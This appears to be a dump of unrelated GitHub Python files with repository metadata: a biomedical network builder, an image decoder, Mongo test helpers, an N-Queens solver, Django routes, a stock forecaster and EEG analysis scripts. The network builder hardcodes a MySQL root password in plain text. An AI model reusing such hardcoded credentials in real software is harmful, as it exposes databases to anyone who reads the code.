self.annotations['spot_list'][spot1]['Word']\n\t\t\t# n2 = self.annotations['spot_list'][spot2]['Word']\n\t\t\tn1 = spot1['Word']\n\t\t\tn2 = spot2['Word']\n\t\t\t#self.write_log(\"Saving edges for: \"+sentence+\" - \"+n1+\" \"+edge_label+\" \"+n2)\n\t\t\tindex_e = -1\n\t\t\tedge_id = hashlib.md5((n1+n2+edge_label).encode('utf-8')).hexdigest()\n\t\t\t#edge\n\t\t\tfor index, edge in enumerate(self.net['edges']):\n\t\t\t\tif(edge['data']['id'] == edge_id):\n\t\t\t\t\tindex_e = index\t\t\n\t\t\tbio = 0\n\t\t\tnew_edge = {\"id\": edge_id, \"source\": n1, \"target\": n2, \"label\": edge_label, \"weight\": 0, \"mrho\": 0, \"bio\": bio}\n\t\t\tif index_e == -1: #edge not found ,new insert\n\t\t\t\tnew_edge['aid'] = {id_article}\n\t\t\t\t#mrho\n\t\t\t\t#new_edge['mrho'] = (float(self.annotations['spot_list'][spot1]['rho'])+float(self.annotations['spot_list'][spot2]['rho']))/2\n\t\t\t\tnew_edge['mrho'] = (float(spot1['rho'])+float(spot2['rho']))/2\n\t\t\t\tnew_edge['tf'] = {}\n\t\t\t\tnew_edge['tf'][id_article] = {'tf': 1, 'total_words': total_words}\n\t\t\t\tnew_edge['sentences'] = {}\n\t\t\t\tnew_edge['sentences'][id_article] = []\n\t\t\t\tnew_edge['sentences'][id_article].append(sentence)\n\t\t\t\tself.write_log(\"INSERT edge : \"+sentence+\" - \"+n1+\" \"+edge_label+\" \"+n2)\n\t\t\t\tself.net['edges'].append({'data': new_edge})\n\t\t\telse:\n\t\t\t\tnew_edge['aid'] = self.net['edges'][index_e]['data']['aid']\n\t\t\t\tnew_edge['aid'].add(id_article)\n\t\t\t\tnew_edge['tf'] = self.net['edges'][index_e]['data']['tf']\n\t\t\t\tnew_edge['sentences'] = self.net['edges'][index_e]['data']['sentences']\n\t\t\t\t#mrho\n\t\t\t\tnew_edge['mrho'] = ((float(spot1['rho'])+float(spot2['rho']))/2 + self.net['edges'][index_e]['data']['mrho'])/2\n\t\t\t\t#TFIDF PARAMETERS\n\t\t\t\tif id_article not in new_edge['tf']:\n\t\t\t\t\tnew_edge['tf'][id_article] = {'tf': 1, 'total_words': total_words}\n\t\t\t\telse:\n\t\t\t\t\tnew_edge['tf'][id_article]['tf']+=1 \n\t\t\t\t#Sentences\n\t\t\t\tif id_article not in new_edge['sentences']:\n\t\t\t\t\tnew_edge['sentences'][id_article] = []\n\t\t\t\tif sentence not in new_edge['sentences'][id_article]:\n\t\t\t\t\tnew_edge['sentences'][id_article].append(sentence)\n\t\t\t\tself.write_log(\"UPDATE edge : \"+sentence+\" - \"+n1+\" \"+edge_label+\" \"+n2)\n\t\t\t\tself.net['edges'][index_e] = {'data': new_edge}\n\t\t\t\t\n\t\t\t\t\n\t\t\t# Node\n\t\t\tif(n1 == n2):\n\t\t\t\tfoundn2 = True\n\t\t\tfor node in self.net['nodes']:\n\t\t\t\tif (node['data']['label'] == n1):\n\t\t\t\t\tfoundn1 = True\n\t\t\t\t\tnode['data']['size']+=1\n\t\t\t\tif (node['data']['label'] == n2):\n\t\t\t\t\tfoundn2 = True\n\t\t\t\t\tnode['data']['size']+=1\n\t\t\tif not foundn1:\n\t\t\t\tself.net['nodes'].append({'data': {\"id\": n1, \"label\": n1, \"size\": 1, \"spot\": spot1}})\n\t\t\tif not foundn2:\n\t\t\t\tself.net['nodes'].append({'data': {\"id\": n2, \"label\": n2, \"size\": 1, \"spot\": spot2}})\n\t\texcept Exception as e:\n\t\t\tself.write_log(\"Error in save_edge: \"+str(e))\n\t\t\n\t############## DATABASE ##################\n\t\t\t\n\tdef db_connect(self):\n\t\tself.db = mysql.connector.connect(host=\"localhost\", user=\"root\", password=\"tagmetagme85\", database=\"netme\", buffered=True, auth_plugin='mysql_native_password')\t\n\t\n\tdef get_conjunctionterms(self):\n\t\tsql = \"SELECT * FROM netme.conjunctionterms\"\n\t\tterms = []\n\t\ttry:\n\t\t\tcursor = self.db.cursor(dictionary=True)\n\t\t\tcursor.execute(sql)\n\t\t\tres = cursor.fetchall()\n\t\t\tfor r in res:\n\t\t\t\tterms.append(r['term']) \n\t\texcept Exception as e:\n\t\t\tself.write_log(\"Error in get_conjunctionterms: \"+str(e))\n\t\treturn terms\n\t\n\tdef get_negationterms(self):\n\t\tsql = \"SELECT * FROM netme.negationterms\"\n\t\tterms = []\n\t\ttry:\n\t\t\tcursor = self.db.cursor(dictionary=True)\n\t\t\tcursor.execute(sql)\n\t\t\tres = cursor.fetchall()\n\t\t\tfor r in res:\n\t\t\t\tterms.append(r['term']) \n\t\texcept Exception as e:\n\t\t\tself.write_log(\"Error in get_negationterms: \"+str(e))\n\t\treturn terms\n\t\t\n\tdef get_bioterms(self):\n\t\tsql = \"SELECT * FROM netme.bioterms\"\n\t\tterms = []\n\t\ttry:\n\t\t\tcursor = self.db.cursor(dictionary=True)\n\t\t\tcursor.execute(sql)\n\t\t\tres = cursor.fetchall()\n\t\t\tfor r in res:\n\t\t\t\tterms.append(r['term']) \n\t\texcept Exception as e:\n\t\t\tself.write_log(\"Error in get_bioterms: \"+str(e))\n\t\treturn terms\n\t\t\n\tdef get_request(self):\n\t\tsql = \"SELECT * FROM netme.requests WHERE id = %s\"\n\t\tsql_data = (self.searchid,)\n\t\ttry:\n\t\t\tcursor = self.db.cursor(dictionary=True)\n\t\t\tcursor.execute(sql, sql_data)\n\t\t\tres = cursor.fetchall()\n\t\t\tfor r in res:\n\t\t\t\treturn r\n\t\texcept Exception as e:\n\t\t\tself.write_log(\"Error in get_requests: \"+str(e))\n\t\treturn None\n\t\n\tdef get_dump(self):\n\t\tsql = \"SELECT * FROM netme.dumps WHERE id = %s\"\n\t\tsql_data = (self.searchid,)\n\t\ttry:\n\t\t\tcursor = self.db.cursor(dictionary=True)\n\t\t\tcursor.execute(sql, sql_data)\n\t\t\tres = cursor.fetchall()\n\t\t\tfor r in res:\n\t\t\t\treturn r\n\t\texcept Exception as e:\n\t\t\tself.write_log(\"Error in get_dump: \"+str(e))\n\t\treturn None\n\t\n\tdef save_dump(self, text):\n\t\tself.db.reconnect()\n\t\tsql = \"INSERT INTO netme.dumps (id, data) VALUES (%s, %s) ON DUPLICATE KEY UPDATE data = %s, update_on = CURRENT_TIMESTAMP()\"\n\t\tsql_data = (self.searchid, text, text)\n\t\ttry:\n\t\t\tcursor = self.db.cursor(dictionary=True)\n\t\t\tcursor.execute(sql, sql_data)\n\t\t\tself.db.commit()\n\t\t\tself.db.close()\n\t\t\treturn True\n\t\texcept Exception as e:\n\t\t\tself.write_log(\"Error in save_dump: \"+str(e))\n\t\treturn False\n\t\n\tdef save_annotations_db(self, id_article, text):\n\t\tsql = \"INSERT INTO netme.annotations (id, id_article, data) VALUES (%s, %s, %s)\"\n\t\tsql_data = (self.searchid, id_article, text)\n\t\ttry:\n\t\t\tcursor = self.db.cursor(dictionary=True)\n\t\t\tcursor.execute(sql, sql_data)\n\t\t\tself.db.commit()\n\t\t\treturn True\n\t\texcept Exception as e:\n\t\t\tself.write_log(\"Error in save_annotations_db: \"+str(e))\n\t\treturn False\n\t\t\n\tdef get_annotations(self, id_article):\n\t\tif \"pmc|\" in id_article or \"pubmed|\" in id_article:\n\t\t\t#I can search between id_article directly\n\t\t\tsql = \"SELECT * FROM netme.annotations WHERE id_article = %s\"\n\t\t\tsql_data = (id_article,)\n\t\telse:\n\t\t\tsql = \"SELECT * FROM netme.annotations WHERE id = %s AND id_article = %s\"\n\t\t\tsql_data = (self.searchid, id_article)\n\t\ttry:\n\t\t\tcursor = self.db.cursor(dictionary=True)\n\t\t\tcursor.execute(sql, sql_data)\n\t\t\tres = cursor.fetchall()\n\t\t\tfor r in res:\n\t\t\t\treturn r\n\t\texcept Exception as e:\n\t\t\tself.write_log(\"Error in get_annotations: \"+str(e))\n\t\treturn None\n\t\n\t############## LOG ##################\n\t\t\n\tdef reset_log(self):\n\t\tlogfile_path = self.path+\"logs/\"+self.searchid\n\t\tif(os.path.exists(logfile_path)):\n\t\t\tos.remove(logfile_path)\n\t\t\n\tdef write_log(self, text):\n\t\ttry:\n\t\t\tlogfile_path = self.path+\"logs/\"+self.searchid\n\t\t\tfile = open(logfile_path, 'a') \n\t\t\ttime = datetime.datetime.now().strftime(\"%Y-%m-%d %H:%M:%S\")\n\t\t\ttext = time + \":\\t\\t\" + text + \"\\n\"\n\t\t\tfile.write(text) \n\t\t\tfile.close() \n\t\t\tif(self.debug):\n\t\t\t\tprint(text+ \"\\n\")\n\t\texcept Exception as e:\n\t\t\tprint(str(e))\n\t\t\t\nn = NetBuilder();\n","repo_name":"alemuscolino/netme","sub_path":"py/netbuilder.py","file_name":"netbuilder.py","file_ext":"py","file_size_in_byte":24171,"program_lang":"python","lang":"en","doc_type":"code","stars":4,"dataset":"github-code","pt":"77"} +{"seq_id":"29116293084","text":"from PIL import Image\nimport sys\nimport io\nimport lz4.block\nimport os\n\ndef b2i(b):\n return int.from_bytes(b, byteorder=\"little\")\n\ndef save_to_png(width, height, data, filename):\n img = Image.frombytes('RGBA', (width,height), data)\n img.save(sys.argv[2])\n\ndef main():\n with open(sys.argv[1], \"rb\") as f:\n magic = f.read(0x04)\n bpp = f.read(0x04)\n width = f.read(0x04)\n height = f.read(0x04)\n size = f.read(0x04)\n zsize = f.read(0x04)\n data = f.read(b2i(zsize))\n \n decompressed = io.BytesIO(lz4.block.decompress(data, uncompressed_size=b2i(size)))\n \n size = decompressed.read(0x04)\n zsize = decompressed.read(0x04)\n data = decompressed.read(b2i(zsize))\n\n decompressedf = lz4.block.decompress(data, uncompressed_size=b2i(size))\n\n save_to_png(b2i(width), b2i(height), decompressedf, os.path.basename(sys.argv[1]))\n\n\n return\n\nif __name__ == \"__main__\":\n main()","repo_name":"Konosprod/fantastic-engine","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":978,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"77"} +{"seq_id":"70257466490","text":"from mongo_to_geojson.tests.test_config import COLLECTION, MONGO_URI\nfrom pymongo import MongoClient\nimport click\nimport json\nimport os\nimport tempfile\n\n\ndef get_temp_jsonfile_path():\n '''\n Returns a valid temp json file path without having created it\n :return:\n '''\n return os.path.join(tempfile.gettempdir(), next(tempfile._get_candidate_names()) + \".json\")\n\n\ndef create_parameter_file_input(parameter):\n '''\n creates a temp json file and dumps a parameter into it\n :param parameter: parameter from test_config.py\n :return: file path containing parameter data\n '''\n parameter_file_path = get_temp_jsonfile_path()\n with open(parameter_file_path, 'w') as f:\n json.dump(parameter, f)\n return parameter_file_path\n\n@click.command()\ndef load_test_data():\n '''\n Atempts to load a Mongo DB with test data using parameters in test_config. A couple\n of conditions need to be met in order for this to work:\n 1. the collection as specified in test_config.py COLLECTION variable has been exported using\n mongoexport (with --jsonArray flag) into mongo_to_geojson.tests.data folder with naming\n convention COLLECTION.json\n :return:\n '''\n collection_json_array_file = os.path.join(os.path.dirname(os.path.abspath(__file__)),'data', '{0}.json'.format(COLLECTION))\n with open(collection_json_array_file, 'r') as i:\n data = json.load(i)\n\n client = MongoClient(MONGO_URI)\n db = client.get_database()\n db[COLLECTION].insert_many(data)\n\n\nif __name__ == '__main__':\n load_test_data()","repo_name":"madnut-ua/mongo2geojson","sub_path":"mongo_to_geojson/tests/test_utils.py","file_name":"test_utils.py","file_ext":"py","file_size_in_byte":1567,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"77"} +{"seq_id":"27099591969","text":"class Solution:\n n=0\n cur=[]\n ans=[]\n def solveNQueens(self, n: int) -> List[List[str]]:\n self.n=n\n self.cur=[-1 for i in range(n)]\n self.ans=[]\n self.dfs(0)\n return self.ans\n \n def dfs(self,i:int):\n for j in range(self.n):\n found = False\n for k in range(i):\n if self.cur[k]==j:\n found = True\n break\n if abs(self.cur[k]-j)==abs(i-k):\n found = True\n break\n if found:\n continue\n self.cur[i]=j\n if i==(self.n-1):\n # print(self.cur)\n tmp=[]\n for k in range(self.n):\n tmp.append(\".\"*self.cur[k]+\"Q\"+\".\"*(self.n-self.cur[k]-1))\n self.ans.append(tmp)\n self.cur[i]=-1\n return\n self.dfs(i+1)\n self.cur[i]=-1\n return ","repo_name":"0xtinyuk/LeetCode","sub_path":"Algorithms/51. N-Queens.py","file_name":"51. N-Queens.py","file_ext":"py","file_size_in_byte":981,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"77"} +{"seq_id":"41114231087","text":"#!/usr/bin/env python3\n# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Wed Jan 20 19:10:43 2021\n\n@author: sunbeam\n\"\"\"\n\nimport plotly.graph_objects as go\n\nimport plotly.io as pio\n#pio.renderers.default = 'svg'\npio.renderers.default = 'browser'\nimport pandas as pd\n\nimport numpy as np\nimport tensorflow as tf\nfrom tensorflow import keras\nfrom datetime import datetime\n\ndf = pd.read_csv(\"/home/sunbeam/Documents/STOCK_DATASETS_FINAL/AAPL.csv\",parse_dates=[0])\n\nprint(df)\npre_date =pd.Series(pd.date_range(datetime.today(), periods=30))\nx = df['Date']\ny = df['Close']\n\npre_date.shape\n\nx.shape\ny.shape\n\ninput_data_date = df.Date[len(df)-100:]\ninput = df.Close\n\nfrom sklearn.preprocessing import MinMaxScaler\nscaler=MinMaxScaler(feature_range=(0,1))\ndf1=scaler.fit_transform(np.array(input).reshape(-1,1))\n\n#input_data = np.array(df1[len(df1)-100-1:len(df1)-1]).reshape(-1,1)\ninput_data = np.array(df1[len(df1)-100:]).reshape(-1,1)\nprint(df1[-1])\nprint(input_data)\nprint(len(input_data))\n\n\nmodel = keras.models.load_model('my_time_series_model.h5')\n\npredictions = model.predict(np.array(input_data).reshape(1,-1).reshape((1,100,1)))\n\nprint(scaler.inverse_transform(predictions))\n\nx_input = np.array(input_data[:]).reshape(1,-1)\nx_input.shape\n\ntemp_input = list(x_input)\ntemp_input=temp_input[0].tolist()\n\n\n# demonstrate prediction for next 10 days\nfrom numpy import array\n\nlst_output=[]\nn_steps=100\ni=0\nwhile(i<30):\n \n if(len(temp_input)>100):\n #print(temp_input)\n x_input=np.array(temp_input[1:])\n print(\"{} day input {}\".format(i,x_input))\n x_input=x_input.reshape(1,-1)\n x_input = x_input.reshape((1, n_steps, 1))\n #print(x_input)\n yhat = model.predict(x_input, verbose=0)\n print(\"{} day output {}\".format(i,yhat))\n temp_input.extend(yhat[0].tolist())\n temp_input=temp_input[1:]\n #print(temp_input)\n lst_output.extend(yhat.tolist())\n i=i+1\n else:\n x_input = x_input.reshape((1, n_steps,1))\n yhat = model.predict(x_input, verbose=0)\n print(yhat[0])\n temp_input.extend(yhat[0].tolist())\n print(len(temp_input))\n lst_output.extend(yhat.tolist())\n i=i+1\n \n\nprint(lst_output)\nfinal_y = scaler.inverse_transform(lst_output).reshape(1,-1).tolist()[0]\n\nfig = go.Figure(data=go.Scatter(x=pre_date, y=final_y, mode='markers'))\n\nfig.show()","repo_name":"greatgreek9/flask_time_series","sub_path":"tester.py","file_name":"tester.py","file_ext":"py","file_size_in_byte":2368,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"77"} +{"seq_id":"39878154567","text":"#!/usr/bin/env python2\n# -*- coding: utf-8 -*-\n\n\"\"\"\n===============================================================================\nScript 'make-confmats-from-classifier-output.py'\n===============================================================================\n\nThis script converts output from a series of binary phonological feature\nclassifiers into segment probabilities formatted as a confusion matrix.\n\"\"\"\n# @author: drmccloy\n# Created on Wed Apr 6 12:43:04 2016\n# License: BSD (3-clause)\n\n\nfrom __future__ import division, print_function\nimport yaml\nimport json\nimport numpy as np\nimport os.path as op\nfrom os import mkdir\nfrom pandas import Series, DataFrame, read_csv, concat\nfrom numpy import logical_not as negate\nfrom aux_functions import find_EER_threshold\n\n# flags\nadd_missing_feats = False\nuse_eng_superset = False\n\n# file i/o\nparamdir = 'params'\noutdir = 'processed-data'\nanalysis_params = 'current-analysis-settings.yaml'\nif not op.isdir(outdir):\n mkdir(outdir)\n\n# load analysis params\nwith open(op.join(paramdir, analysis_params), 'r') as paramfile:\n params = yaml.safe_load(paramfile)\nclf_type = params['clf_type']\nuse_dss = params['dss']['use']\nn_dss_channels_to_use = params['dss']['use_n_channels']\nprocess_individual_subjs = params['process_individual_subjs']\nfname_suffix = '-dss-{}'.format(n_dss_channels_to_use) if use_dss else ''\nsquaremat = '' if use_eng_superset else '-square'\nfname_id = '{}{}'.format(clf_type, fname_suffix)\n\n\ndef compute_classifier_scores_from_probs(featprob):\n # use probabilities as scores\n pos_class = featprob.columns[[x.startswith('+') for x in featprob.columns]]\n featscore = featprob[pos_class]\n featscore.index = [ipa[x] for x in featscore.index] # convert to IPA\n featscore.columns = [x[1:] for x in featscore.columns] # remove +/- sign\n assert len(featscore.columns) == len(np.unique(featscore.columns))\n # ground truth\n feattruth = DataFrame([feat_ref.loc[seg] for seg in featscore.index])\n return featscore, feattruth\n\n\ndef add_missing_feat_EERs(featscore, equal_error_rate):\n # add EER of 0.5 for all missing features\n missing_feats = feat_tab.columns[np.in1d(feat_tab.columns,\n featscore.columns, invert=True)]\n equal_error_rate = np.r_[equal_error_rate,\n 0.5 * np.ones(missing_feats.size)]\n equal_error_rate = Series(equal_error_rate,\n index=np.r_[featscore.columns, missing_feats])\n return missing_feats, equal_error_rate\n\n\ndef add_missing_feats_to_ref(feat_ref, missing_feats):\n z = np.zeros((feat_ref.shape[0], missing_feats.size), dtype=int)\n missing_df = DataFrame(z, columns=missing_feats, index=feat_ref.index)\n return concat((feat_ref, missing_df), axis=1)\n\n\ndef make_weights_matrix(equal_error_rate, foreign, english):\n # make binary mask of feature matches: shape=(foreign_cons, eng_cons, feat)\n # 1. add 1 to remap binary feature values as 1 (absence) or 2 (presence)\n # 2. multiply each English phone's feature value with each foreign one\n # 3. if product is 1 or 4 then feats. match, if product is 2 then mismatch\n mask = np.einsum('ik,jk->ijk', 1 + foreign, 1 + english) != 2\n # convert equal_error_rate to (1 - equal_error_rate) when features match\n # (this yields probability of \"correct\" classification for each feature\n # when considering feature values of each English phone as a prior)\n feat_prob_mat = np.abs(mask.astype(int) - equal_error_rate.values)\n # aggregate feature classif. probs. into phone classif. probs.\n weights_matrix = np.exp(-np.sum(-np.log(feat_prob_mat), axis=-1))\n return weights_matrix\n\n\n# load ancillary data\nlangs = np.load(op.join(paramdir, 'langs.npy'))\nsubj_dict = np.load(op.join(paramdir, 'subjects.npz'))\nwith open(op.join(paramdir, 'ascii-to-ipa.json'), 'r') as f:\n ipa = json.load(f)\nfeat_path_eng = op.join(paramdir, 'reference-feature-table-english.tsv')\nfeat_ref_eng = read_csv(feat_path_eng, sep='\\t', index_col=0, encoding='utf-8')\nfeat_ref_all = read_csv(op.join(paramdir, 'reference-feature-table-all.tsv'),\n sep='\\t', index_col=0, encoding='utf-8')\nfeat_ref = read_csv(op.join(paramdir, 'reference-feature-table-cons.tsv'),\n sep='\\t', index_col=0, encoding='utf-8')\n# this sort order is for the classifier features only\nsort_by = ['consonantal', 'labial', 'coronal', 'dorsal', 'continuant',\n 'sonorant', 'periodicGlottalSource', 'distributed', 'strident']\nfeat_ref_cons = feat_ref.sort_values(by=sort_by, ascending=False)\nfeat_ref_all = feat_ref_all.sort_values(by=sort_by, ascending=False)\nfeat_ref_eng = feat_ref_eng.sort_values(by=sort_by, ascending=False)\nfeat_ref = feat_ref_all\n# convert to binary if needed\nif isinstance(feat_ref.iloc[0, 0], (str, unicode)):\n feat_ref = feat_ref.apply(lambda x: x == '+').astype(int)\n# load each language's phone sets\nwith open(op.join(paramdir, 'phonesets.json'), 'r') as f, \\\n open(op.join(paramdir, 'allphones.json'), 'r') as g:\n phonesets = json.load(f)\n all_phones = json.load(g)\nif use_eng_superset:\n with open(op.join(paramdir, 'eng-phones-superset.json'), 'r') as f:\n eng_phones = json.load(f)\nelse:\n eng_phones = phonesets['eng']\n\n# read in PHOIBLE feature data\nfeat_tab = read_csv(op.join(paramdir, 'phoible-segments-features.tsv'),\n sep='\\t', encoding='utf-8', index_col=0)\nfeat_tab = feat_tab.loc[all_phones]\nassert feat_tab.shape[0] == len(all_phones)\n\n# eliminate redundant features\nvacuous = feat_tab.apply(lambda x: len(np.unique(x)) == 1).values\nprivative = feat_tab.apply(lambda x: len(np.unique(x)) == 2 and\n '0' in np.unique(x)).values\nfeat_tab = feat_tab.iloc[:, negate(vacuous | privative)]\n\n# add 'syllabic' to beginning of sort order to group vowels together\nfeat_tab = feat_tab.sort_values(by=sort_by, ascending=False)\n\n# init some containers\nfeatscores = dict()\nweights_mats = dict()\nequal_error_rates = DataFrame()\n\n# iterate over languages\nfor lang in langs:\n # load classification results\n fname = 'classifier-probabilities-{}-{}.tsv'.format(lang, fname_id)\n fpath = op.join(outdir, fname)\n featprob = read_csv(fpath, sep='\\t', index_col=0)\n # use probabilities as scores\n featscore, feattruth = compute_classifier_scores_from_probs(featprob)\n featscores[lang] = featscore\n # find threshold for each feat to equalize error rate\n thresholds = np.zeros_like(featscore.columns, dtype=float)\n equal_error_rate = np.zeros_like(featscore.columns, dtype=float)\n for ix, feat in enumerate(featscore.columns):\n label = ' ({}: {})'.format(lang, feat)\n (thresholds[ix],\n equal_error_rate[ix]) = find_EER_threshold(featscore[feat],\n feattruth[feat], label)\n \"\"\"\n # check thresholds are actually yielding equal error rates\n predictions = (featscore >= thresholds).astype(int)\n false_pos = (predictions.values & negate(feattruth.values)).sum(axis=0)\n false_neg = (negate(predictions.values) & feattruth.values).sum(axis=0)\n assert np.array_equal(false_pos, false_neg)\n # calculate equal error rates for each feature\n equal_error_rate = false_pos / predictions.shape[0]\n \"\"\"\n if add_missing_feats:\n (missing_feats,\n equal_error_rate) = add_missing_feat_EERs(featscore, equal_error_rate)\n feat_ref_expanded = add_missing_feats_to_ref(feat_ref, missing_feats)\n else:\n equal_error_rate = Series(equal_error_rate, index=featscore.columns)\n feat_ref_expanded = feat_ref\n # propogate add'l features to english feature table\n feat_ref_eng_expanded = feat_ref_expanded.loc[eng_phones]\n # create confusion matrix\n feat_ref_foreign = feat_ref_expanded.loc[phonesets[lang]]\n # aggregate feature classif. probs. into phone classif. probs.\n weights_matrix = make_weights_matrix(equal_error_rate, feat_ref_foreign,\n feat_ref_eng_expanded)\n raise RuntimeError\n # save to global variables\n equal_error_rates[lang] = equal_error_rate\n weights_mats[lang] = DataFrame(weights_matrix, index=phonesets[lang],\n columns=eng_phones)\n# save results\neer_fname = 'equal-error-rates-{}{}.tsv'.format(fname_id, squaremat)\nequal_error_rates.to_csv(op.join(outdir, eer_fname), sep='\\t')\nfor lang, wmat in weights_mats.items():\n confmat_fname = 'eeg-confusion-matrix-{}-{}{}.tsv'.format(lang, fname_id,\n squaremat)\n wmat.to_csv(op.join(outdir, confmat_fname), sep='\\t', encoding='utf-8')\n\n# process individual subjects\nif process_individual_subjs:\n for subj_id in subj_dict.keys():\n subj_outdir = op.join(outdir, subj_id)\n # init some containers\n featscores = dict()\n weights_mats = dict()\n equal_error_rates = DataFrame()\n print('processing subject {}'.format(subj_id))\n for lang in langs:\n fid = '{}-{}'.format(lang, fname_id)\n # load classification results\n fname = ('classifier-probabilities-{}-{}.tsv'.format(fid, subj_id))\n if op.exists(op.join(subj_outdir, fname)):\n featprob = read_csv(op.join(subj_outdir, fname), sep='\\t',\n index_col=0)\n # use probabilities as scores\n featscore, feattruth = \\\n compute_classifier_scores_from_probs(featprob)\n featscores[lang] = featscore\n # find threshold for each feat to equalize error rate\n thresholds = np.zeros_like(featscore.columns, dtype=float)\n equal_error_rate = np.zeros_like(featscore.columns,\n dtype=float)\n for ix, feat in enumerate(featscore.columns):\n label = ' ({}: {})'.format(lang, feat)\n (thresholds[ix], equal_error_rate[ix]) = \\\n find_EER_threshold(featscore[feat], feattruth[feat],\n label)\n \"\"\"\n # check thresholds are actually yielding equal error rates\n predictions = (featscore >= thresholds).astype(int)\n false_pos = (predictions.values & negate(feattruth.values)\n ).sum(axis=0)\n false_neg = (negate(predictions.values) & feattruth.values\n ).sum(axis=0)\n assert np.array_equal(false_pos, false_neg)\n # calculate equal error rates for each feature\n equal_error_rate = false_pos / predictions.shape[0]\n \"\"\"\n if add_missing_feats:\n missing_feats, equal_error_rate = \\\n add_missing_feat_EERs(featscore, equal_error_rate)\n feat_ref_expanded = \\\n add_missing_feats_to_ref(feat_ref, missing_feats)\n else:\n equal_error_rate = Series(equal_error_rate,\n index=featscore.columns)\n feat_ref_expanded = feat_ref\n # propogate add'l features to english feature table\n feat_ref_eng_expanded = feat_ref_expanded.loc[eng_phones]\n # create confusion matrix\n feat_ref_foreign = feat_ref_expanded.loc[phonesets[lang]]\n # aggregate feature classif. probs. into phone classif. probs.\n weights_matrix = make_weights_matrix(equal_error_rate,\n feat_ref_foreign,\n feat_ref_eng_expanded)\n # save to global variables\n equal_error_rates[lang] = equal_error_rate\n weights_mats[lang] = DataFrame(weights_matrix,\n index=phonesets[lang],\n columns=eng_phones)\n # save results\n eer_fname = 'equal-error-rates-{}{}-{}.tsv'.format(fname_id, squaremat,\n subj_id)\n equal_error_rates.to_csv(op.join(subj_outdir, eer_fname), sep='\\t')\n for lang, wmat in weights_mats.items():\n fid = '{}-{}{}'.format(lang, fname_id, squaremat)\n wmat_fname = 'eeg-confusion-matrix-{}-{}.tsv'.format(fid, subj_id)\n wmat.to_csv(op.join(subj_outdir, wmat_fname), sep='\\t',\n encoding='utf-8')\n","repo_name":"drammock/eeg-phone-coding","sub_path":"old-stuff/make-confmats-from-classifier-output.py","file_name":"make-confmats-from-classifier-output.py","file_ext":"py","file_size_in_byte":12703,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"77"} +{"seq_id":"31434301057","text":"from django.urls import path\n\nfrom additional.views import GameCopyrightViewSet, \\\n SongCopyrightViewSet, GameCopyrightItem, SongCopyrightItem\n\nurlpatterns = [\n path('copyrights/game', GameCopyrightViewSet.as_view(\n {\n 'post': 'create',\n 'get': 'list'\n }\n )),\n path('copyrights/game/', GameCopyrightItem.as_view(\n {\n 'get': 'retrieve',\n 'put': 'update',\n 'delete': 'destroy'\n }\n )),\n path('copyrights/song', SongCopyrightViewSet.as_view(\n {\n 'post': 'create',\n 'get': 'list'\n }\n )),\n path('copyrights/song/', SongCopyrightItem.as_view(\n {\n 'get': 'retrieve',\n 'put': 'update',\n 'delete': 'destroy'\n }\n ))\n]\n","repo_name":"Aldeshov/youtube.api","sub_path":"additional/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":818,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"77"} +{"seq_id":"28439771534","text":"import sys\nimport math\nimport numpy as np\nfrom scipy.special import gamma as gamma_func\nfrom scipy.special import gammaln\nfrom scipy.special import polygamma\nfrom scipy.misc import factorial\nimport scipy.stats as spstats\n\n\nclass Model(object):\n\n def __init__(self, N, index, library_size, transcript_abundance=None, theta=[], seed=None, threads=1):\n self.N = N\n self.index = index\n self.delta = None\n self.pZ = []\n self.phi = []\n self.ld = transcript_abundance\n self.theta = theta\n self.seed = seed\n self.threads = threads\n\n self.T = 2\n self.K = 3 # including unknown\n\n # Initialize all Model-specific parameters\n self.initialize_delta(library_size)\n self.initialize_pZ()\n self.get_phi()\n\n def get_kappa_beta(self, theta):\n kappa, beta_12, beta_21, beta_22 = theta\n beta = [[0.0, beta_12],\n [beta_21, beta_22]]\n return kappa, np.array(beta)\n\n def output_states(self, out):\n with open(out, \"w\") as f_out:\n\n # header with parameter values\n f_out.write(\"# k*: %.5f\\n\" % self.theta[0])\n f_out.write(\"# beta: %.5f|%.5f|%.5f\\n\" % tuple(self.theta[1:]))\n \n\n for k, v in self.index.items():\n start, end = v\n for j, (x, y, z, l) in enumerate(zip(self.N[0][start:end], self.N[1][start:end], \n self.pZ[start:end], self.ld[start:end]), 1):\n f_out.write(\"%s\\n\" % \"\\t\".join([str(k), str(j), \n str(x), str(y), \n str(np.argmax(z)),\n \"\\t\".join([\"%.3f\"] * len(z)) % tuple(z),\n \"%.2f\" % l]))\n\n # DONE - deal with (T,K)\n def randomize_theta(self, t, k):\n if self.seed:\n np.random.seed(self.seed)\n self.theta = np.random.random(1+((t*k)-1))\n \n # DONE\n def initialize_delta(self, library_size):\n delta = [0.0, 0.0] \n delta[1] = np.log(float(library_size[1])/float(library_size[0]))\n self.delta = np.array(delta)\n\n # DONE\n def initialize_ld(self, transcript_abundance):\n self.ld = np.array(transcript_abundance)\n\n # DONE - deal with (T,K)\n def initialize_pZ(self, alpha=10):\n # dirichlet distribution\n d = spstats.dirichlet(tuple([alpha] * self.K), self.seed)\n self.pZ = d.rvs(self.N.shape[1])\n \n # TOREMOVE\n def calculate_TPM(self):\n ld_V1 = []\n ld_S1 = []\n for i in xrange(len(self.N[0])):\n ld_V1.append(self.N[0][i].sum() / float(len(self.N[0][i])))\n ld_S1.append(self.N[1][i].sum() / float(len(self.N[1][i])))\n \n ld_V1 = np.array(ld_V1)\n ld_S1 = np.array(ld_S1)\n \n TPM_V1 = (10.0**6 * ld_V1)/ld_V1.sum()\n TPM_S1 = (10.0**6 * ld_S1)/ld_S1.sum()\n \n self.TPM = (TPM_V1 + TPM_S1)/2.0\n \n # DONE - ld for every element\n def get_ld(self, theta):\n\n kappa, beta = self.get_kappa_beta(theta)\n \n new_ld = []\n\n N = self.N.sum(axis=0)\n Z = self.pZ[:,0] + self.pZ[:,1]\n\n num_1 = (self.pZ[:,0] * N) - (self.pZ[:,1] * kappa)\n den_1 = 1.0 + np.exp(self.delta[1] + beta[1][0])\n num_2 = 